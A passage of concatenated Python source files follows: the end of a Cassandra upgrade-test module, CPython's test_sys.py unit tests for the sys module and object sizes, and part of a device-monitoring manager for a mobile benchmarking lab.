nnode.start(use_jna=True, wait_other_notice=240, wait_for_binary_proto=True)
self._write_values()
self._increment_counters()
self._check_values()
self._check_counters()
def test_bootstrap(self):
# try and add a new node
self.upgrade_scenario(after_upgrade_call=(self._bootstrap_new_node,))
def test_bootstrap_multidc(self):
# try and add a new node
# multi dc, 2 nodes in each dc
self.prepare()
cluster = self.cluster
if cluster.version() >= '3.0':
cluster.set_configuration_options({'enable_user_defined_functions': 'true',
'enable_scripted_user_defined_functions': 'true'})
elif cluster.version() >= '2.2':
cluster.set_configuration_options({'enable_user_defined_functions': 'true'})
cluster.populate([2, 2])
[node.start(use_jna=True, wait_for_binary_proto=True) for node in self.cluster.nodelist()]
self._multidc_schema_create()
self.upgrade_scenario(populate=False, create_schema=False, after_upgrade_call=(self._bootstrap_new_node_multidc,))
def _multidc_schema_create(self):
session = self.patient_cql_connection(self.cluster.nodelist()[0], protocol_version=self.protocol_version)
if self.cluster.version() >= '1.2':
# DDL for C* 1.2+
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':2};")
else:
# DDL for C* 1.1
session.execute("""CREATE KEYSPACE upgrade WITH strategy_class = 'NetworkTopologyStrategy'
AND strategy_options:'dc1':1
AND strategy_options:'dc2':2;
""")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k int PRIMARY KEY , v text )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 text,
k2 int,
c counter,
PRIMARY KEY (k1, k2)
);""")
def create_upgrade_class(clsname, version_metas, protocol_version,
bootstrap_test=False, extra_config=None):
"""
Dynamically creates a test subclass for testing the given versions.
'clsname' is the name of the new class.
'protocol_version' is an int.
'bootstrap_test' is a boolean, if True bootstrap testing will be included. Default False.
'version_list' is a list of versions ccm will recognize, to be upgraded in order.
'extra_config' is tuple of config options that can (eventually) be cast as a dict,
e.g. (('partitioner', org.apache.cassandra.dht.Murmur3Partitioner''))
"""
if extra_config is None:
extra_config = (('partitioner', 'org.apache.cassandra.dht.Murmur3Partitioner'),)
if bootstrap_test:
parent_classes = (TestUpgrade, BootstrapMixin)
else:
parent_classes = (TestUpgrade,)
# short names for debug output
parent_class_names = [cls.__name__ for cls in parent_classes]
print("Creating test class {} ".format(clsname))
print(" for C* versions:\n{} ".format(pprint.pformat(version_metas)))
print(" using protocol: v{}, and parent classes: {}".format(protocol_version, parent_class_names))
print(" to run these tests alone, use `nosetests {}.py:{}`".format(__name__, clsname))
upgrade_applies_to_env = RUN_STATIC_UPGRADE_MATRIX or version_metas[-1].matches_current_env_version_family
newcls = type(
clsname,
parent_classes,
{'test_version_metas': version_metas, '__test__': True, 'protocol_version': protocol_version, 'extra_config': extra_config}
)
# Remove the skip annotation in the superclass we just derived from, we will add it back if we actually intend
# to skip with a better message
newcls.pytestmark = [mark for mark in newcls.pytestmark if not mark.name == "skip"]
if not upgrade_applies_to_env:
newcls.pytestmark.append(pytest.mark.skip("test not applicable to env"))
if clsname in globals():
raise RuntimeError("Class by name already exists!")
globals()[clsname] = newcls
return newcls
MultiUpgrade = namedtuple('MultiUpgrade', ('name', 'version_metas', 'protocol_version', 'extra_config'))
MULTI_UPGRADES = (
# Proto v3 upgrades (v3 is supported on 2.1, 2.2, 3.0, 3.11)
MultiUpgrade(name='TestProtoV3Upgrade_AllVersions_EndsAt_3_11_X',
version_metas=[current_2_1_x, current_2_2_x, current_3_0_x, indev_3_11_x], protocol_version=3, extra_config=None),
MultiUpgrade(name='TestProtoV3Upgrade_AllVersions_RandomPartitioner_EndsAt_3_11_X_HEAD',
version_metas=[current_2_1_x, current_2_2_x, current_3_0_x, indev_3_11_x], protocol_version=3,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
# Proto v4 upgrades (v4 is supported on 2.2, 3.0, 3.1, trunk)
MultiUpgrade(name='TestProtoV4Upgrade_AllVersions_EndsAt_Trunk_HEAD',
version_metas=[current_2_2_x, current_3_0_x, current_3_11_x, indev_trunk], protocol_version=4, extra_config=None),
MultiUpgrade(name='TestProtoV4Upgrade_AllVersions_RandomPartitioner_EndsAt_Trunk_HEAD',
version_metas=[current_2_2_x, current_3_0_x, current_3_11_x, indev_trunk], protocol_version=4,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
#Beta versions don't work with this test since it doesn't specify use beta in the client
#It's fine I guess for now? Can update on release
# Proto v5 upgrades (v5 is supported on 3.0, 3.11, trunk)
# MultiUpgrade(name='TestProtoV5Upgrade_AllVersions_EndsAt_Trunk_HEAD',
# version_metas=[current_3_0_x, current_3_x, indev_trunk], protocol_version=5, extra_config=None),
# MultiUpgrade(name='TestProtoV5Upgrade_AllVersions_RandomPartitioner_EndsAt_Trunk_HEAD',
# version_metas=[current_3_0_x, current_3_x, indev_trunk], protocol_version=5,
# extra_config=(
# ('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
# )),
)
for upgrade in MULTI_UPGRADES:
# if any version_metas are None, this means they are versions not to be tested currently
if all(upgrade.version_metas):
metas = upgrade.version_metas
if not RUN_STATIC_UPGRADE_MATRIX:
if metas[-1].matches_current_env_version_family:
# looks like this test should actually run in the current env, so let's set the final version to match the env exactly
oldmeta = metas[-1]
newmeta = oldmeta.clone_with_local_env_version()
logger.debug("{} appears applicable to current env. Overriding final test version from {} to {}".format(upgrade.name, oldmeta.version, newmeta.version))
metas[-1] = newmeta
create_upgrade_class(upgrade.name, [m for m in metas], protocol_version=upgrade.protocol_version, extra_config=upgrade.extra_config)
for pair in build_upgrade_pairs():
create_upgrade_class(
'Test' + pair.name,
[pair.starting_meta, pair.upgrade_meta],
protocol_version=pair.starting_meta.max_proto_v,
bootstrap_test=True
)
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.support
import sys, io, os
import struct
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assert_("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit as exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit as exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit as exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit as exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit as exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, _thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(_thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = _thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, str))
self.assert_(isinstance(sys.exec_prefix, str))
self.assert_(isinstance(sys.executable, str))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxsize, int))
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, str))
self.assert_(isinstance(sys.prefix, str))
self.assert_(isinstance(sys.version, str))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
self.assertRaises(TypeError, sys.intern)
s = "never interned before"
self.assert_(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assert_(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "division_warning",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read()
self.assertEqual(out, "\xa2\n".encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, b'?')
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.support.unlink(test.support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
# add GC header size
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
vh = self.vheader
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(vh) + self.H)
# but lists are
self.assertEqual(sys.getsizeof([]), size(vh + 'PP') + gc_header_size)
def test_default(self):
h = self.header
vh = self.vheader
size = self.calcsize
self.assertEqual(sys.getsizeof(True), size(vh) + self.H)
self.assertEqual(sys.getsizeof(True, -1), size(vh) + self.H)
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(vh) + self.H)
# buffer
# XXX
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size(h + 'P'))
# code
check(get_cell().__code__, size(h + '5i8Pi2P'))
# complex
check(complex(0,1), size(h + '2d'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.keys(), size(h + 'P'))
# dictionary-valueiterator
check({}.values(), size(h + 'P'))
# dictionary-itemiterator
check({}.items(), size(h + 'P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# BaseException
check(BaseException(), size(h + '5P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size(h + '5P 2P2PP'))
# UnicodeDecodeError
# XXX
# check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size(h + '5P 2P2PP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# reverse
check(reversed(''), size(h + 'PP'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '11P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0, size(vh))
check(1, size(vh) + self.H)
check(-1, size(vh) + self.H)
check(32768, size(vh) + 2*self.H)
check(32768*32768-1, size(vh) + 2*self.H)
check(32768*32768, size(vh) + 3*self.H)
# memory
check(memoryview(b''), size(h + 'P PP2P2i5P'))
# module
check(unittest, size(h + '3P'))
# None
check(None, size(h + ''))
# NotImplementedType
check(NotImplemented, size(h))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(range(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# range
check(range(1), size(h + '3P'))
check(range(66000), size(h + '3P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(0), size(h + '3P'))
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('16Pi17P 3P 10P 2P 2P')
check(int, s)
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# unicode
usize = len('\0'.encode('unicode-internal'))
samples = ['', '1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
basicsize = size(h + 'PPliP') + usize * (len(s) + 1)
check(s, basicsize)
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_setfilesystemencoding(self):
old = sys.getfilesystemencoding()
sys.setfilesystemencoding("iso-8859-1")
self.assertEqual(sys.getfilesystemencoding(), "iso-8859-1")
sys.setfilesystemencoding(old)
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
device_manager.py
|
#!/usr/bin/env python
##############################################################################
# Copyright 2020-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import time
from threading import Thread, RLock
from typing import Dict
from bridge.db import DBDriver
from get_connected_devices import GetConnectedDevices
from platforms.android.adb import ADB
from platforms.platforms import getDeviceList
from reboot_device import reboot as reboot_device
from utils.custom_logger import getLogger
REBOOT_INTERVAL = datetime.timedelta(hours=8)
MINIMUM_DM_INTERVAL = 10
DEFAULT_DM_INTERVAL = 10
def getDevicesString(devices):
device_list = [
d["kind"]
+ "|"
+ d["hash"]
+ "|"
+ d["name"]
+ "|"
+ d["abi"]
+ "|"
+ d["os"]
+ "|"
+ ("1" if d["available"] else "0" if d["live"] else "2")
for d in devices
]
devices_str = ",".join(device_list)
return devices_str
def valid_dm_interval(arg) -> int:
try:
value = int(arg)
if value < MINIMUM_DM_INTERVAL:
raise ValueError()
except ValueError:
getLogger().warning(
"Logging interval must be specified as an integer in seconds >= {}. Using default {}s.".format(
MINIMUM_DM_INTERVAL, DEFAULT_DM_INTERVAL
)
)
value = DEFAULT_DM_INTERVAL
return value
class DeviceManager(object):
"""
Provides devices metadata to the lab instance. For mobile platforms, checks connectivity of devices and performs updates to lab devices and db.
"""
def __init__(self, args: Dict, db: DBDriver):
self.args = args
self.db: DBDriver = db
self.lab_devices = {}
self.online_devices = None
self._initializeDevices()
self.running = True
self.device_monitor_interval = self.args.device_monitor_interval
self.device_monitor = Thread(target=self._runDeviceMonitor)
self.device_monitor.start()
if self.args.usb_hub_device_mapping:
from utils.usb_controller import USBController
self.usb_controller = USBController(self.args.usb_hub_device_mapping)
else:
self.usb_controller = None
def getLabDevices(self):
"""Return a reference to the lab's device meta data."""
return self.lab_devices
def _runDeviceMonitor(self):
while self.running:
# if the lab is hosting mobile devices, thread will monitor connectivity of devices.
if self.args.platform.startswith(
"android"
) or self.args.platform.startswith("ios"):
self._checkDevices()
self._updateHeartbeats()
time.sleep(self.device_monitor_interval)
def _checkDevices(self):
"""Run any device health checks, e.g. connectivity, battery, etc."""
try:
online_hashes = getDeviceList(self.args, silent=True)
offline_devices = [
device
for device in self.online_devices
if device["hash"] not in online_hashes
]
new_devices = [
h
for h in online_hashes
if h not in [p["hash"] for p in self.online_devices]
]
if offline_devices:
for offline_device in offline_devices:
lab_device = self.lab_devices[offline_device["kind"]][
offline_device["hash"]
]
usb_disabled = False
if self.usb_controller and not self.usb_controller.active.get(
lab_device["hash"], True
):
usb_disabled = True
if "rebooting" not in lab_device and not usb_disabled:
getLogger().error(
"Device {} has become unavailable.".format(offline_device)
)
self._disableDevice(offline_device)
if new_devices:
devices = ",".join(new_devices)
devices = self._getDevices(devices)
if devices:
for d in devices:
self._enableDevice(d)
if d["hash"] not in [
device["hash"] for device in self.online_devices
]:
self.online_devices.append(d)
getLogger().info("New device added: {}".format(d))
except BaseException:
getLogger().exception("Error while checking devices.")
def _updateHeartbeats(self):
"""Update device heartbeats for all devices which are marked "live" in lab devices."""
claimer_id = self.args.claimer_id
hashes = []
for k in self.lab_devices:
for hash in self.lab_devices[k]:
if self.lab_devices[k][hash]["live"]:
hashes.append(hash)
hashes = ",".join(hashes)
self.db.updateHeartbeats(claimer_id, hashes)
def _getDevices(self, devices=None):
"""Get list of device meta data for available devices."""
raw_args = []
raw_args.extend(["--platform", self.args.platform])
if self.args.platform_sig:
raw_args.append("--platform_sig")
raw_args.append(self.args.platform_sig)
if devices:
raw_args.append("--devices")
raw_args.append(devices)
elif self.args.devices:
raw_args.append("--devices")
raw_args.append(self.args.devices)
if self.args.hash_platform_mapping:
# if the user provides filename, we will load it.
raw_args.append("--hash_platform_mapping")
raw_args.append(self.args.hash_platform_mapping)
if self.args.device_name_mapping:
# if the user provides filename, we will load it.
raw_args.append("--device_name_mapping")
raw_args.append(self.args.device_name_mapping)
app = GetConnectedDevices(raw_args=raw_args)
devices_json = app.run()
assert devices_json, "Devices cannot be empty"
devices = json.loads(devices_json.strip())
return devices
def _initializeDevices(self):
"""Create device meta data used by lab instance, and update devices in db."""
self.online_devices = self._getDevices()
for k in self.online_devices:
kind = k["kind"]
hash = k["hash"]
name = k["name"]
abi = k["abi"]
os = k["os"]
entry = {
"kind": kind,
"hash": hash,
"name": name,
"abi": abi,
"os": os,
"available": True,
"live": True,
"start_time": None,
"done_time": None,
"output_dir": None,
"job": None,
"adb": ADB(hash, self.args.android_dir),
"reboot_time": datetime.datetime.now() - datetime.timedelta(hours=8),
"usb_hub": {},
}
if kind not in self.lab_devices:
self.lab_devices[kind] = {}
self.lab_devices[kind][hash] = entry
dvs = [
self.lab_devices[k][h]
for k in self.lab_devices
for h in self.lab_devices[k]
]
self.db.updateDevices(self.args.claimer_id, getDevicesString(dvs), True)
def _disableDevice(self, device):
kind = device["kind"]
hash = device["hash"]
entry = self.lab_devices[kind][hash]
entry["available"] = False
entry["live"] = False
self.online_devices.remove(device)
self.db.updateDevices(
self.args.claimer_id,
getDevicesString([self.lab_devices[kind][hash]]),
False,
)
def _enableDevice(self, device):
kind = device["kind"]
hash = device["hash"]
name = device["name"]
abi = device["abi"]
os = device["os"]
entry = {
"kind": kind,
"hash": hash,
"name": name,
"abi": abi,
"os": os,
"available": True,
"live": True,
"start_time": None,
"done_time": None,
"output_dir": None,
"job": None,
"adb": ADB(hash, self.args.android_dir),
"reboot_time": datetime.datetime.now() - datetime.timedelta(hours=8),
"usb_hub": {},
}
if kind not in self.lab_devices:
self.lab_devices[kind] = {}
self.lab_devices[kind][hash] = entry
self.db.updateDevices(
self.args.claimer_id,
getDevicesString([self.lab_devices[kind][hash]]),
False,
)
def _sendErrorReport(self, emsg):
# TODO: send alert to support team to troubleshoot
raise NotImplementedError
def shutdown(self):
self.db.updateDevices(self.args.claimer_id, "", True)
self.running = False
class CoolDownDevice(Thread):
"""Used by AsyncRun to cool device down after benchmark. Will reboot the device if required and add rebooting status to device entry."""
def __init__(self, device, args, db, force_reboot, LOCK: RLock):
Thread.__init__(self)
self.device = device
self.args = args
self.db = db
self.force_reboot = force_reboot
self.LOCK = LOCK
def run(self):
reboot = self.args.reboot and (
self.force_reboot
or self.device["reboot_time"] + REBOOT_INTERVAL < datetime.datetime.now()
)
success = True
# reboot mobile devices if required
if reboot:
raw_args = []
raw_args.extend(["--platform", self.args.platform])
raw_args.extend(["--device", self.device["hash"]])
raw_args.extend(["--android_dir", self.args.android_dir])
self.device["rebooting"] = True
